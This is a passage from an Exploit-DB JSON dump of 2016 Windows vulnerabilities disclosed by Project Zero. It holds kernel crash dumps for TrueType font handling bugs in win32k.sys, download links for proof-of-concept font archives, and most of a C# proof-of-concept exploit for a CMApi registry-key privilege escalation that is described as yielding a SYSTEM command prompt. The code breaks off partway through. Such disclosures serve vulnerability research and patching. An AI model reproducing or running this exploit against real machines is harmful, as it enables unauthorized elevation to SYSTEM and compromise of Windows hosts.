win32k!sbit_Embolden+0x34d\r\n8fb73e68 8efc3e10 fb972fd0 fc200ea0 faec6040 win32k!sbit_GetBitmap+0x18c\r\n8fb73eb4 8efc9ff1 fc200010 fc20007c faec6040 win32k!fs_ContourScan+0x192\r\n8fb73ff8 8efbef89 00000028 00000020 faec6000 win32k!lGetGlyphBitmap+0x1aa\r\n8fb74020 8efbedd6 00000000 00000001 00000020 win32k!ttfdQueryFontData+0x15e\r\n8fb74070 8efbdff2 fbf98010 fa794cf0 00000001 win32k!ttfdSemQueryFontData+0x45\r\n8fb740b8 8f14eef5 fbf98010 fa794cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e\r\n8fb740e8 8f14ef48 fc586f20 ffa84130 8fb74114 win32k!RFONTOBJ::bInsertGlyphbitsLookaside+0xa7\r\n8fb740f8 8f050663 0000000a fc586f20 8fb74798 win32k!RFONTOBJ::cGetGlyphDataLookaside+0x1c\r\n8fb74114 8f03b2fc 8fb74798 8fb74148 8fb74144 win32k!STROBJ_bEnum+0x6c\r\n8fb7414c 8f03b4d9 00000001 8fb74358 00000d0d win32k!GetTempTextBufferMetrics+0x61\r\n8fb743d4 8ee34042 fc1cadb8 8fb74798 fa794cf0 win32k!EngTextOut+0x26\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n8fb74410 8f13cce0 fb16edb8 8fb74798 fa794cf0 VBoxDisp+0x4042\r\n8fb7446c 8f03dbcb fef7cc90 8fb74798 fa794cf0 win32k!WatchdogDrvTextOut+0x51\r\n8fb744b8 8f03de38 8f13cc8f 8fb74724 fb16edb8 win32k!OffTextOut+0x71\r\n8fb7473c 8f03d9a8 fb16edb8 8fb74798 fa794cf0 win32k!SpTextOut+0x1a2\r\n8fb74a38 8efcc2d4 8fb74bfc fc0b8e20 fc0b8e7c win32k!GreExtTextOutWLocked+0x1040\r\n8fb74ab4 8f01f251 00000000 ff7bf064 00001000 win32k!GreBatchTextOut+0x1e6\r\n8fb74c24 8284cd5c 000000bc 001afd88 001afdb4 win32k!NtGdiFlushUserBatch+0x123\r\n8fb74c34 76f16bf3 badb0d00 001afd88 00000000 nt!KiSystemServiceAccessTeb+0x10\r\n8fb74c38 badb0d00 001afd88 00000000 00000000 ntdll!KiFastSystemCall+0x3\r\n8fb74c3c 001afd88 00000000 00000000 00000000 0xbadb0d00\r\n8fb74c40 00000000 00000000 00000000 00000000 0x1afd88\r\n---\r\n\r\nWhile the two above crashes look differently, we believe they manifest a single security issue, as they occur interchangeably with our proof of concept files. The first one is a NULL pointer dereference while performing a list unlinking operation, while the second is an attempt to write to memory which has already been freed, and they both indicate a use-after-free condition. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the \"OS/2\" and \"VDMX\" tables.\r\n\r\nThe issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes. It is also required for the \"Adjust for best performance\" option to be set in \"System > Advanced system settings > Advanced > Performance > Settings\", most likely due to the \"Smooth edges of screen fonts\" getting unchecked.\r\n\r\nAttached is an archive with three proof of concept font files.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40599.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40599/"}, {"lastseen": "2016-10-21T01:29:36", "description": "Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120). CVE-2016-3209. Dos exploit for Windows platform", "published": "2016-10-20T00:00:00", "type": "exploitdb", "title": "Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3209"], "modified": "2016-10-20T00:00:00", "id": "EDB-ID:40598", "href": "https://www.exploit-db.com/exploits/40598/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=864\r\n\r\nWe have encountered a number of Windows kernel crashes in the win32k!itrp_GetCVTEntryFast function (called by the handler of the RCVT TrueType instruction) while processing corrupted TTF font files, such as:\r\n\r\n---\r\nPAGE_FAULT_IN_NONPAGED_AREA (50)\r\nInvalid system memory was referenced. This cannot be protected by try-except,\r\nit must be protected by a Probe. Typically the address is just plain bad or it\r\nis pointing at freed memory.\r\nArguments:\r\nArg1: fb000078, memory referenced.\r\nArg2: 00000000, value 0 = read operation, 1 = write operation.\r\nArg3: 8ee70ccb, If non-zero, the instruction address which referenced the bad memory\r\n\taddress.\r\nArg4: 00000000, (reserved)\r\n\r\nDebugging Details:\r\n------------------\r\n\r\n\r\nREAD_ADDRESS: fb000078 Paged session pool\r\n\r\nFAULTING_IP: \r\nwin32k!itrp_GetCVTEntryFast+8\r\n8ee70ccb 8b048a mov eax,dword ptr [edx+ecx*4]\r\n\r\nMM_INTERNAL_CODE: 0\r\n\r\nIMAGE_NAME: win32k.sys\r\n\r\nDEBUG_FLR_IMAGE_TIMESTAMP: 57349934\r\n\r\nMODULE_NAME: win32k\r\n\r\nFAULTING_MODULE: 8ee20000 win32k\r\n\r\nDEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT\r\n\r\nBUGCHECK_STR: 0x50\r\n\r\nPROCESS_NAME: csrss.exe\r\n\r\nCURRENT_IRQL: 2\r\n\r\nANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre\r\n\r\nTRAP_FRAME: 897b3568 -- (.trap 0xffffffff897b3568)\r\nErrCode = 00000000\r\neax=fafffcdc ebx=00000000 ecx=000000ff edx=fafffc7c esi=fafffe6e edi=00000000\r\neip=8ee70ccb esp=897b35dc ebp=897b3620 iopl=0 nv up ei pl nz na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206\r\nwin32k!itrp_GetCVTEntryFast+0x8:\r\n8ee70ccb 8b048a mov eax,dword ptr [edx+ecx*4] ds:0023:fb000078=????????\r\nResetting default scope\r\n\r\nLAST_CONTROL_TRANSFER: from 828edd87 to 82889978\r\n\r\nSTACK_TEXT: \r\n897b30bc 828edd87 00000003 7170889f 00000065 nt!RtlpBreakWithStatusInstruction\r\n897b310c 828ee885 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c\r\n897b34d0 8289c94d 00000050 fb000078 00000000 nt!KeBugCheck2+0x68b\r\n897b3550 8284efa8 00000000 fb000078 00000000 nt!MmAccessFault+0x104\r\n897b3550 8ee70ccb 00000000 fb000078 00000000 nt!KiTrap0E+0xdc\r\n897b35d8 8ee83782 fafffe7b 8ee7bf89 00000001 win32k!itrp_GetCVTEntryFast+0x8\r\n897b35e0 8ee7bf89 00000001 8ee81af3 00000000 win32k!itrp_RCVT+0x63\r\n897b35e8 8ee81af3 00000000 fafffcdc faffff10 win32k!itrp_InnerExecute+0x38\r\n897b3620 8ee7bf89 fafffcdc 8ee7f3b1 fafffd70 win32k!itrp_CALL+0x23b\r\n897b3628 8ee7f3b1 fafffd70 fafffd38 faffff90 win32k!itrp_InnerExecute+0x38\r\n897b36a8 8ee7cee8 fafffec8 faffff10 fafffcdc win32k!itrp_Execute+0x2b2\r\n897b36dc 8ee85d0d fafffcdc 00000000 fa44a298 win32k!itrp_ExecutePrePgm+0x5d\r\n897b36f8 8ee7f67c fa44a51c fafffc7c fa44a2c4 win32k!fsg_RunPreProgram+0x78\r\n897b3758 8ee89385 00000001 897b3774 8ee892dc win32k!fs__Contour+0x1c1\r\n897b3764 8ee892dc fa44a010 fa44a07c 897b3790 win32k!fs_ContourGridFit+0x12\r\n897b3774 8ee89c38 fa44a010 fa44a07c 00000003 win32k!fs_NewContourGridFit+0x10\r\n897b3790 8ee89c79 fc11ae78 00000003 897b37cc win32k!bGetGlyphOutline+0xd7\r\n897b37b8 8ee89e72 fc11ae78 00000003 00000001 win32k!bGetGlyphMetrics+0x20\r\n897b38fc 8ee7ef89 fc11ae78 00000003 897b39ec win32k!lGetGlyphBitmap+0x2b\r\n897b3924 8ee7edd6 00000000 00000001 00000003 win32k!ttfdQueryFontData+0x15e\r\n897b3974 8ee7dff2 fc396010 fc1d0cf0 00000001 win32k!ttfdSemQueryFontData+0x45\r\n897b39bc 8ee7e169 fc396010 fc1d0cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e\r\n897b3a30 8ee7bc81 00000002 897b3bdc 00000000 win32k!RFONTOBJ::bInitCache+0xd4\r\n897b3aec 8eef8655 897b3bc8 897b3b94 00000003 win32k!RFONTOBJ::bRealizeFont+0x5df\r\n897b3b98 8eef8890 fc74ad80 00000000 00000002 win32k!RFONTOBJ::bInit+0x2f4\r\n897b3bb0 8ee8f111 897b3bc8 00000000 00000002 win32k!RFONTOBJ::vInit+0x16\r\n897b3bd4 8ee8f262 fc1d0cf0 897b3bf4 0678b8bd win32k!GreGetRealizationInfo+0x2a\r\n897b3c24 8284bdc6 37010587 0459f2cc 0459f2e4 win32k!NtGdiGetRealizationInfo+0x41\r\n897b3c24 77346bf4 37010587 0459f2cc 0459f2e4 nt!KiSystemServicePostCall\r\n0459f2e4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet\r\n---\r\n\r\nThe bugcheck is caused by an attempt to access an out-of-bounds CVT table index (255 in this case, see the ECX register), likely due to a weird behavior of the win32k!itrp_RCVT function, which allows the index to be larger than the size of the array as long as it is smaller than 256. The bug appears to only enable an out-of-bounds read primitive, since at a first glance, the corresponding WCVT instruction handler does not seem to be affected by the same problem. Still, even in its current form, the vulnerability could be used to disclose the contents of adjacent pool allocations to user-mode, potentially leaking sensitive kernel memory or facilitating a KASLR bypass.\r\n\r\nThe issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys, but it is also possible to observe a crash on a default Windows installation. Just hovering over the proof of concept files or opening them in the default Windows Font Viewer tool should be sufficient to trigger the condition.\r\n\r\nAttached is an archive with two proof of concept font files.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40598.zip\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40598/"}, {"lastseen": "2016-10-19T01:30:20", "description": "Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124). CVE-2016-0075. Local exploit for Windows platform", "published": "2016-10-18T00:00:00", "type": "exploitdb", "title": "Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0075"], "modified": "2016-10-18T00:00:00", "id": "EDB-ID:40573", "href": "https://www.exploit-db.com/exploits/40573/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=872\r\n\r\nWindows: DeviceApi CMApi PiCMOpenClassKey Arbitrary Registry Key Write EoP\r\nPlatform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nThe DeviceApi CMApi PiCMOpenClassKey IOCTL allows a normal user to create arbitrary registry keys in the system hive leading to elevation of privilege.\r\n\r\nDescription:\r\n\r\nThe DeviceApi is a driver implemented inside the kernel which exposes a number of devices. One of those is CMApi which presumably is short for configuration manager API as it primarily exposes device configuration from the registry to the caller. The device exposes calls using IOCTLs, in theory anything which \u201ccreates\u201d or \u201cdeletes\u201d an object is limited behind an access check which only administrators have access to. However certain calls feed into the call PnpCtxRegCreateTree which will allow a user to open parts of the registry, and if they\u2019re not there will create the keys. This is a problem as the keys are created in the user\u2019s context using ZwCreateKey but without forcing an access check (it does this intentionally, as otherwise the user couldn\u2019t create the key). All we need to do is find a CMApi IOCTL which will create the arbitrary keys for us.\r\n\r\nFortunately it\u2019s not that simple, all the ones I find using the tree creation function verify that string being passed from the user meets some valid criteria and is always placed into a subkey which the user doesn\u2019t have direct control over. However I noticed PiCMOpenDeviceKey allows a valid 3 part path, of the form ABC\\DEF\\XYZ to be specified and the only criteria for creating this key is it exists as a valid device under CurrentControlSet\\Enum, however the keys will be created under CurrentControlSet\\Hardware Profiles which doesn\u2019t typically exist. The majority of calls to this IOCTL will apply a very restrictive security descriptor to the new keys, however if you specify the 0x200 device type flag it will use the default SD which will be inherited from the parent key. Even if this didn\u2019t provide a useful ACE (in this case it has the default CREATOR OWNER giving full access) as it\u2019s created under our user context we are the owner and so could rewrite the DACL anyway.\r\n\r\nTo convert this into a full arbitrary write we can specify a device path which doesn\u2019t already exist and it will create the three registry keys. If we now delete the last key and replace it with a symbolic link we can point it at any arbitrary key. As the system hive is trusted this isn\u2019t affected by the inter-hive symbolic link protections (and at anyrate services is in the same hive), however this means that the exploit won\u2019t work from low-IL due to restrictions on creating symbolic links from sandboxes.\r\n\r\nYou should be treating anything which calls PnpCtxRegCreateTree or SysCtxRegCreateKey as suspect, especially if no explicit security descriptor is being passed. For example you can use PiCMOpenDeviceInterfaceKey to do something very similar and get an arbitrary Device Parameters key created with full control for any device interface which doesn\u2019t already have one. You can\u2019t use the same symbolic link trick here (you only control the leaf key) however there might be a driver which has exploitable behaviour if the user can create a arbitrary Device Parameters key. \r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# source code file. You need to compile it first targeted .NET 4 and above. It will create a new IFEO for a executable we know can be run from the task scheduler at system. \r\n\r\n1) Compile the C# source code file.\r\n2) Execute the PoC executable as a normal user.\r\n3) The PoC should print that it successfully created the key. You should find an interactive command prompt running at system on the desktop.\r\n\r\nExpected Result:\r\nThe key access should fail, or at least the keys shouldn\u2019t be writable by the current user. \r\n\r\nObserved Result:\r\nThe key access succeeds and a system level command prompt is created.\r\n*/\r\n\r\nusing Microsoft.Win32;\r\nusing Microsoft.Win32.SafeHandles;\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Diagnostics;\r\nusing System.Linq;\r\nusing System.Reflection;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.AccessControl;\r\nusing System.Text;\r\nusing System.Threading;\r\n\r\nnamespace PoC\r\n{\r\n class Program\r\n {\r\n [Flags]\r\n public enum AttributeFlags : uint\r\n {\r\n None = 0,\r\n Inherit = 0x00000002,\r\n Permanent = 0x00000010,\r\n Exclusive = 0x00000020,\r\n CaseInsensitive = 0x00000040,\r\n OpenIf = 0x00000080,\r\n OpenLink = 0x00000100,\r\n KernelHandle = 0x00000200,\r\n ForceAccessCheck = 0x00000400,\r\n IgnoreImpersonatedDevicemap = 0x00000800,\r\n DontReparse = 0x00001000,\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n public sealed class UnicodeString\r\n {\r\n ushort Length;\r\n ushort MaximumLength;\r\n [MarshalAs(UnmanagedType.LPWStr)]\r\n string Buffer;\r\n\r\n public UnicodeString(string str)\r\n {\r\n Length = (ushort)(str.Length * 2);\r\n MaximumLength = (ushort)((str.Length * 2) + 1);\r\n Buffer = str;\r\n }\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n public sealed class ObjectAttributes : IDisposable\r\n {\r\n int Length;\r\n IntPtr RootDirectory;\r\n IntPtr ObjectName;\r\n AttributeFlags Attributes;\r\n IntPtr SecurityDescriptor;\r\n IntPtr SecurityQualityOfService;\r\n\r\n private static IntPtr AllocStruct(object s)\r\n {\r\n int size = Marshal.SizeOf(s);\r\n IntPtr ret = Marshal.AllocHGlobal(size);\r\n Marshal.StructureToPtr(s, ret, false);\r\n return ret;\r\n }\r\n\r\n private static void FreeStruct(ref IntPtr p, Type struct_type)\r\n {\r\n Marshal.DestroyStructure(p, struct_type);\r\n Marshal.FreeHGlobal(p);\r\n p = IntPtr.Zero;\r\n }\r\n\r\n public ObjectAttributes(string object_name, AttributeFlags flags, IntPtr rootkey)\r\n {\r\n Length = Marshal.SizeOf(this);\r\n if (object_name != null)\r\n {\r\n ObjectName = AllocStruct(new UnicodeString(object_name));\r\n }\r\n Attributes = flags;\r\n RootDirectory = rootkey;\r\n }\r\n\r\n public ObjectAttributes(string object_name, AttributeFlags flags) \r\n : this(object_name, flags, IntPtr.Zero)\r\n {\r\n }\r\n\r\n public void Dispose()\r\n {\r\n if (ObjectName != IntPtr.Zero)\r\n {\r\n FreeStruct(ref ObjectName, typeof(UnicodeString));\r\n }\r\n GC.SuppressFinalize(this);\r\n }\r\n\r\n ~ObjectAttributes()\r\n {\r\n Dispose();\r\n }\r\n }\r\n\r\n [Flags]\r\n public enum LoadKeyFlags\r\n {\r\n None = 0,\r\n AppKey = 0x10,\r\n Exclusive = 0x20,\r\n Unknown800 = 0x800,\r\n ReadOnly = 0x2000,\r\n }\r\n\r\n [Flags]\r\n public enum GenericAccessRights : uint\r\n {\r\n None = 0,\r\n GenericRead = 0x80000000,\r\n GenericWrite = 0x40000000,\r\n GenericExecute = 0x20000000,\r\n GenericAll = 0x10000000,\r\n Delete = 0x00010000,\r\n ReadControl = 0x00020000,\r\n WriteDac = 0x00040000,\r\n WriteOwner = 0x00080000,\r\n Synchronize = 0x00100000,\r\n MaximumAllowed = 0x02000000,\r\n }\r\n\r\n public class NtException : ExternalException\r\n {\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n private static extern IntPtr GetModuleHandle(string modulename);\r\n\r\n [Flags]\r\n enum FormatFlags\r\n {\r\n AllocateBuffer = 0x00000100,\r\n FromHModule = 0x00000800,\r\n FromSystem = 0x00001000,\r\n IgnoreInserts = 0x00000200\r\n }\r\n\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n private static extern int FormatMessage(\r\n FormatFlags dwFlags,\r\n IntPtr lpSource,\r\n int dwMessageId,\r\n int dwLanguageId,\r\n out IntPtr lpBuffer,\r\n int nSize,\r\n IntPtr Arguments\r\n );\r\n\r\n [DllImport(\"kernel32.dll\")]\r\n private static extern IntPtr LocalFree(IntPtr p);\r\n\r\n private static string StatusToString(int status)\r\n {\r\n IntPtr buffer = IntPtr.Zero;\r\n try\r\n {\r\n if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,\r\n GetModuleHandle(\"ntdll.dll\"), status, 0, out buffer, 0, IntPtr.Zero) > 0)\r\n {\r\n return Marshal.PtrToStringUni(buffer);\r\n }\r\n }\r\n finally\r\n {\r\n if (buffer != IntPtr.Zero)\r\n {\r\n LocalFree(buffer);\r\n }\r\n }\r\n return String.Format(\"Unknown Error: 0x{0:X08}\", status);\r\n }\r\n\r\n public NtException(int status) : base(StatusToString(status))\r\n {\r\n }\r\n }\r\n\r\n public static void StatusToNtException(int status)\r\n {\r\n if (status < 0)\r\n {\r\n throw new NtException(status);\r\n }\r\n }\r\n\r\n\r\n [Flags]\r\n public enum FileOpenOptions\r\n {\r\n None = 0,\r\n DirectoryFile = 0x00000001,\r\n WriteThrough = 0x00000002,\r\n SequentialOnly = 0x00000004,\r\n NoIntermediateBuffering = 0x00000008,\r\n SynchronousIoAlert = 0x00000010,\r\n SynchronousIoNonAlert = 0x00000020,\r\n NonDirectoryFile = 0x00000040,\r\n CreateTreeConnection = 0x00000080,\r\n CompleteIfOplocked = 0x00000100,\r\n NoEaKnowledge = 0x00000200,\r\n OpenRemoteInstance = 0x00000400,\r\n RandomAccess = 0x00000800,\r\n DeleteOnClose = 0x00001000,\r\n OpenByFileId = 0x00002000,\r\n OpenForBackupIntent = 0x00004000,\r\n NoCompression = 0x00008000,\r\n OpenRequiringOplock = 0x00010000,\r\n ReserveOpfilter = 0x00100000,\r\n OpenReparsePoint = 0x00200000,\r\n OpenNoRecall = 0x00400000,\r\n OpenForFreeSpaceQuery = 0x00800000\r\n }\r\n\r\n public class IoStatusBlock\r\n {\r\n public IntPtr Pointer;\r\n public IntPtr Information;\r\n\r\n public IoStatusBlock(IntPtr pointer, IntPtr information)\r\n {\r\n Pointer = pointer;\r\n Information = information;\r\n }\r\n\r\n public IoStatusBlock()\r\n {\r\n }\r\n }\r\n\r\n [Flags]\r\n public enum ShareMode\r\n {\r\n None = 0,\r\n Read = 0x00000001,\r\n Write = 0x00000002,\r\n Delete = 0x00000004,\r\n }\r\n\r\n [Flags]\r\n public enum FileAccessRights : uint\r\n {\r\n None = 0,\r\n ReadData = 0x0001,\r\n WriteData = 0x0002,\r\n AppendData = 0x0004,\r\n ReadEa = 0x0008,\r\n WriteEa = 0x0010,\r\n Execute = 0x0020,\r\n DeleteChild = 0x0040,\r\n ReadAttributes = 0x0080,\r\n WriteAttributes = 0x0100,\r\n GenericRead = 0x80000000,\r\n GenericWrite = 0x40000000,\r\n GenericExecute = 0x20000000,\r\n GenericAll = 0x10000000,\r\n Delete = 0x00010000,\r\n ReadControl = 0x00020000,\r\n WriteDac = 0x00040000,\r\n WriteOwner = 0x00080000,\r\n Synchronize = 0x00100000,\r\n MaximumAllowed = 0x02000000,\r\n }\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtOpenFile(\r\n out IntPtr FileHandle,\r\n FileAccessRights DesiredAccess,\r\n ObjectAttributes ObjAttr,\r\n [In] [Out] IoStatusBlock IoStatusBlock,\r\n ShareMode ShareAccess,\r\n FileOpenOptions OpenOptions);\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtDeviceIoControlFile(\r\n SafeFileHandle FileHandle,\r\n IntPtr Event,\r\n IntPtr ApcRoutine,\r\n IntPtr ApcContext,\r\n [In] [Out] IoStatusBlock IoStatusBlock,\r\n uint IoControlCode,\r\n SafeHGlobalBuffer InputBuffer,\r\n int InputBufferLength,\r\n SafeHGlobalBuffer OutputBuffer,\r\n int OutputBufferLength\r\n );\r\n\r\n static T DeviceIoControl<T>(SafeFileHandle FileHandle, uint IoControlCode, object input_buffer)\r\n {\r\n using (SafeStructureOutBuffer<T> output = new SafeStructureOutBuffer<T>())\r\n {\r\n using (SafeStructureBuffer input = new SafeStructureBuffer(input_buffer))\r\n {\r\n IoStatusBlock status = new IoStatusBlock();\r\n StatusToNtException(NtDeviceIoControlFile(FileHandle, IntPtr.Zero, IntPtr.Zero,\r\n IntPtr.Zero, status, IoControlCode, input, input.Length,\r\n output, output.Length));\r\n \r\n return output.Result;\r\n }\r\n }\r\n }\r\n\r\n public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit)\r\n {\r\n AttributeFlags flags = AttributeFlags.CaseInsensitive;\r\n if (inherit)\r\n flags |= AttributeFlags.Inherit;\r\n using (ObjectAttributes obja = new ObjectAttributes(name, flags))\r\n {\r\n IntPtr handle;\r\n IoStatusBlock iostatus = new IoStatusBlock();\r\n StatusToNtException(NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions));\r\n return new SafeFileHandle(handle, true);\r\n }\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n class CmApiOpenKeyData\r\n {\r\n public int cbSize; // 0\r\n public int device_type; // 4\r\n public int callback_id; // 8\r\n [MarshalAs(UnmanagedType.LPWStr)]\r\n public string name; // c\r\n public int name_size; // 10\r\n public GenericAccessRights desired_access; // 14\t\r\n public int create; // 18\r\n public int hardware_id; // 1c\r\n public int return_data_size; // 20\r\n\r\n public CmApiOpenKeyData(int device_type, int callback_id, string name, GenericAccessRights desired_access, bool create, int hardware_id, int return_data_size)\r\n {\r\n this.cbSize = Marshal.SizeOf(this);\r\n this.device_type = device_type;\r\n this.callback_id = callback_id;\r\n this.name = name;\r\n this.name_size = (name.Length + 1) * 2;\r\n this.desired_access = desired_access;\r\n this.create = create ? 1 : 0;\r\n this.hardware_id = hardware_id;\r\n this.return_data_size = return_data_size;\r\n }\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n class CmApiOpenKeyResult\r\n {\r\n int size;\r\n public int status;\r\n public long handle;\r\n };\r\n\r\n public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid\r\n {\r\n public SafeHGlobalBuffer(int length)\r\n : this(Marshal.AllocHGlobal(length), length, true)\r\n {\r\n }\r\n\r\n public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle)\r\n : base(owns_handle)\r\n {\r\n Length = length;\r\n SetHandle(buffer);\r\n }\r\n\r\n public int Length\r\n {\r\n get; private set;\r\n }\r\n\r\n protected override bool ReleaseHandle()\r\n {\r\n if (!IsInvalid)\r\n {\r\n Marshal.FreeHGlobal(handle);\r\n handle = IntPtr.Zero;\r\n }\r\n return true;\r\n }\r\n }\r\n\r\n public class SafeStructureBuffer : SafeHGlobalBuffer\r\n {\r\n Type _type;\r\n\r\n public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value))\r\n {\r\n _type = value.GetType();\r\n Marshal.StructureToPtr(value, handle, false);\r\n }\r\n\r\n protected override bool ReleaseHandle()\r\n {\r\n if (!IsInvalid)\r\n {\r\n Marshal.DestroyStructure(handle, _type);\r\n }\r\n return base.ReleaseHandle();\r\n }\r\n }\r\n\r\n public class SafeStructureOutBuffer<T> : SafeHGlobalBuffer\r\n {\r\n public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T)))\r\n {\r\n }\r\n\r\n public T Result\r\n {\r\n get\r\n {\r\n if (IsInvalid)\r\n throw new ObjectDisposedException(\"handle\");\r\n\r\n return Marshal.PtrToStructure<T>(handle);\r\n }\r\n }\r\n }\r\n\r\n static void EnumKeys(RegistryKey rootkey, IEnumerable<string> name_parts, List<string> names, int maxdepth, int current_depth)\r\n { \r\n if (current_depth == maxdepth)\r\n {\r\n names.Add(String.Join(@\"\\\", name_parts));\r\n }\r\n else\r\n {\r\n foreach (string subkey in rootkey.GetSubKeyNames())\r\n {\r\n using (RegistryKey key = rootkey.OpenSubKey(subkey))\r\n { \r\n if (key != null)\r\n { \r\n EnumKeys(key, name_parts.Concat(new string[] { subkey }), names, maxdepth, current_depth + 1); \r\n }\r\n }\r\n }\r\n }\r\n }\r\n\r\n static IEnumerable<string> GetValidDeviceNames()\r\n {\r\n List<string> names = new List<string>();\r\n using (RegistryKey rootkey = Registry.LocalMachine.OpenSubKey(@\"SYSTEM\\CurrentControlSet\\Enum\"))\r\n {\r\n EnumKeys(rootkey, new string[0], names, 3, 0);\r\n }\r\n return names;\r\n }\r\n \r\n static RegistryKey OpenProfileKey(string name)\r\n {\r\n RegistryKey ret = Registry.LocalMachine.OpenSubKey(@\"SYSTEM\\CurrentControlSet\\Hardware Profiles\\0001\\SYSTEM\\CurrentControlSet\\Enum\");\r\n if (name != null)\r\n {\r\n try\r\n {\r\n return ret.OpenSubKey(name);\r\n }\r\n finally\r\n {\r\n ret.Close();\r\n }\r\n }\r\n else\r\n {\r\n return ret;\r\n }\r\n }\r\n\r\n static string FindFirstAccessibleDevice()\r\n {\r\n foreach (string device in GetValidDeviceNames())\r\n {\r\n try\r\n { \r\n using (RegistryKey key = OpenProfileKey(device))\r\n {\r\n if (key == null)\r\n {\r\n return device;\r\n } \r\n }\r\n }\r\n catch { }\r\n }\r\n\r\n return null;\r\n }\r\n\r\n [Flags]\r\n enum KeyCreateOptions\r\n {\r\n None = 0,\r\n NonVolatile = None, \r\n Volatile = 1, \r\n CreateLink = 2,\r\n BackupRestore = 4,\r\n }\r\n\r\n [DllImport(\"ntdll.dll\", CharSet = CharSet.Unicode)]\r\n static extern int NtCreateKey(\r\n out IntPtr KeyHandle,\r\n GenericAccessRights DesiredAccess,\r\n [In] ObjectAttributes ObjectAttributes,\r\n int TitleIndex,\r\n [In] UnicodeString Class,\r\n KeyCreateOptions CreateOptions,\r\n out int Disposition);\r\n\r\n static SafeRegistryHandle CreateKey(SafeRegistryHandle rootkey, string path, AttributeFlags flags, KeyCreateOptions options)\r\n {\r\n using (ObjectAttributes obja = new ObjectAttributes(path, flags | AttributeFlags.CaseInsensitive, rootkey != null ? rootkey.DangerousGetHandle() : IntPtr.Zero))\r\n {\r\n IntPtr handle;\r\n int disposition = 0;\r\n StatusToNtException(NtCreateKey(out handle, GenericAccessRights.MaximumAllowed, obja, 0, null, options, out disposition));\r\n return new SafeRegistryHandle(handle, true);\r\n } \r\n }\r\n\r\n enum RegistryKeyType\r\n {\r\n Link = 6,\r\n }\r\n\r\n [DllImport(\"ntdll.dll\", CharSet = CharSet.Unicode)]\r\n static extern int NtSetValueKey(\r\n SafeRegistryHandle KeyHandle,\r\n UnicodeString ValueName,\r\n int TitleIndex,\r\n RegistryKeyType Type,\r\n byte[] Data,\r\n int DataSize);\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n static extern int NtDeleteKey(SafeRegistryHandle KeyHandle);\r\n\r\n static void DeleteSymbolicLink(SafeRegistryHandle rootkey, string path)\r\n { \r\n using (SafeRegistryHandle key = CreateKey(rootkey, path, AttributeFlags.OpenLink | AttributeFlags.OpenIf, KeyCreateOptions.None))\r\n {\r\n StatusToNtException(NtDeleteKey(key));\r\n } \r\n }\r\n\r\n static SafeRegistryHandle CreateSymbolicLink(SafeRegistryHandle rootkey, string path, string target)\r\n { \r\n SafeRegistryHandle key = CreateKey(rootkey, path, AttributeFlags.OpenIf | AttributeFlags.OpenLink, KeyCreateOptions.CreateLink);\r\n try\r\n {\r\n UnicodeString value_name = new UnicodeString(\"SymbolicLinkValue\");\r\n byte[] data = 